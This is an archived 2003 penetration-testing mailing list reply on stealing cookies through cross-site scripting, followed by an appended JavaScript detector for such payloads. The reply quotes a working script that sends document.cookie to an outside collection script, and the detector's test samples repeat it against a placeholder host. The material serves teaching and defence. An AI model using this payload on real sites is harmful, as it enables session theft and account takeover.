Penetration Testing mailing list archives

RE: Proof of Concept Tool on Web Application Security


From: "Robert Auger" <rauger () spidynamics com>
Date: Mon, 14 Apr 2003 11:12:52 -0400

Now I am testing Cross-Site Scripting to steal the client cookies, or any
other sensitive information. I am working on my own pen-test-testing site,
which is vulnerable to XSS. I was able to display the cookies of the client
at the victim’s machine, but that was not my goal; my goal is to get those
cookies on my machine or any desired location. So is there any way by which
I can transfer the victim’s cookie or any other information to my machine
without interaction of the victim?

This is covered in the cross site scripting FAQ located at
http://www.cgisecurity.com/articles/xss-faq.shtml.
The relevant JavaScript code you are looking for is as follows (an example
from the paper).

<script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie</script>


(Note: This website has a public script that can be used for testing cookie
theft.)


Regards,

Robert Auger
SPI Labs
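
As an added example (not part of the original post or of the FAQ it cites), the following JavaScript shows how a defender could flag the cookie-forwarding script quoted above when it appears in a request parameter, whether it arrives in clear or percent-encoded. The function names, verdict labels and the collector.example host are assumptions made for illustration.

```javascript
// Added example (not from the original post): classify a request parameter
// that may carry the script shown above, in clear or percent-encoded form.

// Byte-wise percent-decoding, repeated a bounded number of times so that
// double-encoded input is normalised too. Malformed escapes are left as-is.
function normalise(raw, maxRounds = 3) {
  let current = String(raw);
  for (let i = 0; i < maxRounds; i++) {
    const decoded = current.replace(/%([0-9a-fA-F]{2})/g,
      (_, hex) => String.fromCharCode(parseInt(hex, 16)));
    if (decoded === current) break;
    current = decoded;
  }
  return current.toLowerCase();
}

// Hypothetical verdict labels: 'cookie-exfil', 'script-injection', 'clean'.
function classify(raw) {
  const text = normalise(raw);
  const findings = [];
  if (/<\s*script\b/.test(text)) findings.push('script-tag');
  if (/document\s*\.\s*cookie/.test(text)) findings.push('cookie-read');
  if (/\blocation\b(\s*\.\s*href)?\s*=/.test(text)) findings.push('navigation');
  let verdict = 'clean';
  if (findings.includes('cookie-read') && findings.includes('navigation')) {
    verdict = 'cookie-exfil';
  } else if (findings.includes('script-tag')) {
    verdict = 'script-injection';
  }
  return { verdict, findings };
}

// Constructed samples; collector.example is a placeholder host.
const plain =
  "<script>document.location='http://collector.example/c?'+document.cookie</script>";
const encoded = [...plain]
  .map(ch => '%' + ch.charCodeAt(0).toString(16).padStart(2, '0')).join('');
const doubleEncoded = encodeURIComponent(encoded);
const benign = 'q=chocolate+cookie+recipes&discount=100%';

for (const [name, value] of Object.entries({ plain, encoded, doubleEncoded, benign })) {
  console.log(name, classify(value).verdict);
}
```

Pattern matching of this kind is a detection aid for logs and filters; the application-side fix is still to encode untrusted output and to mark session cookies HttpOnly so that script cannot read them.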



